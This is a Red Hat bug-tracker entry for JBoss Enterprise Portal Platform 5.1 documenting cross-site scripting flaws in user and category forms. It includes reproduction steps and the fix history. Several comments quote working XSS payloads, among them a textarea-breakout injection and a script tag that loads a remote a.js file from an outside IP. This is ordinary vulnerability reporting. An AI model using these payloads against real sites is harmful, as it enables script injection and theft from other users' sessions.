Bug 793777 (JBEPP-847) - GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms
Summary: GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms
Keywords:
Status: CLOSED NEXTRELEASE
Alias: JBEPP-847
Product: JBoss Enterprise Portal Platform 5
Classification: JBoss
Component: unspecified
Version: 5.1.0.GA
Hardware: Unspecified
OS: Unspecified
high
high
Target Milestone: ---
: 5.1.1.DEV01
Assignee: hfnukal@redhat.com
QA Contact:
URL: http://jira.jboss.org/jira/browse/JBE...
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2011-03-08 23:22 UTC by Gary Hu
Modified: 2012-02-28 16:39 UTC (History)
6 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2011-07-08 08:36:18 UTC
Type: Bug

Attachments (Terms of Use)
Add an attachment (proposed patch, testcase, etc.)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Bugzilla 793517 0 high CLOSED XSS issue in dashboard new page creation 2021-02-22 00:41:40 UTC
Red Hat Issue Tracker GTNPORTAL-1830 0 Major Resolved Cross Site Scripting vulnerabilities in user forms 2013-02-17 06:37:27 UTC
Red Hat Issue Tracker JBEPP-847 0 Major Closed GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms 2013-02-17 06:37:27 UTC

Internal Links: 793517

Description Gary Hu 2011-03-08 23:22:01 UTC 
Help Desk Ticket Reference: https://na7.salesforce.com/500A0000006k4Pm
project_key: JBEPP

A user can place html or javascript as their first or last name causing a viewing user to execute said code. This may happen during user modification or in other actions. Other inputs may be vulnerable as well.

To reproduce this on the EPP 5.1 out of box installation:

1) login as root
2) go to "Users and groups management"
3) under "User Management" click the "Edit User Info" icon
4) In the "First Name" or "Last Name" filed type in something like "<script>alert("hello");</script>".
5) click the "Save" button. The javascript is executed and a pop up shows up.
Comment 1 Gary Hu 2011-03-08 23:22:30 UTC 
Link: Added: This issue Cloned to GTNPORTAL-1830
Comment 2 Prabhat Jha 2011-03-09 03:36:58 UTC 
Security: Removed: Public Added: RHT+eXo
Comment 3 hfnukal@redhat.com 2011-03-23 09:36:00 UTC 
Link: Added: This issue is related to JBEPP-597
Comment 6 hfnukal@redhat.com 2011-04-19 15:27:16 UTC 
Release Notes Text: Added: Text is escaped and no script is executed.
Comment 7 Bruno Machado 2011-06-30 21:02:24 UTC 
I've received a new case about a similar issue and I tested it using epp-5.1.1.DEV01. When I type something like "<script>alert("hello");</script>" the script isn't executed. But, when I type something like "Dashboard</textarea><script>alert("Bad XSS");</script>", the script is still executed.

Ticket link: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
Comment 8 Bruno Machado 2011-06-30 21:12:14 UTC 
Also tested the value "Dashboard</textarea><script>alert("Bad XSS");</script>" in RH03, the script was executed and "Bad XSS" message was showed.

Steps to reproduce:

1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:

Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>

or

Dashboard</textarea><script>alert("Bad XSS");</script>

5. Click on Save button.
Comment 9 Thomas Heute 2011-07-08 08:36:18 UTC 
Reclose the issue.
This one was about User form, and the case that reopened it is about category description, I opened a separate Jira: JBEPP-997
Comment 10 Scott Mumford 2011-07-11 01:36:23 UTC 
Release Notes Docs Status: Added: Not Required
Release Notes Text: Removed: Text is escaped and no script is executed. Added: Included in the Release Note for JBEPP-598
Comment 11 hfnukal@redhat.com 2011-09-07 16:19:04 UTC 
Security: Removed: RHT+eXo Added: Public
Note You need to log in before you can comment on or make changes to this bug.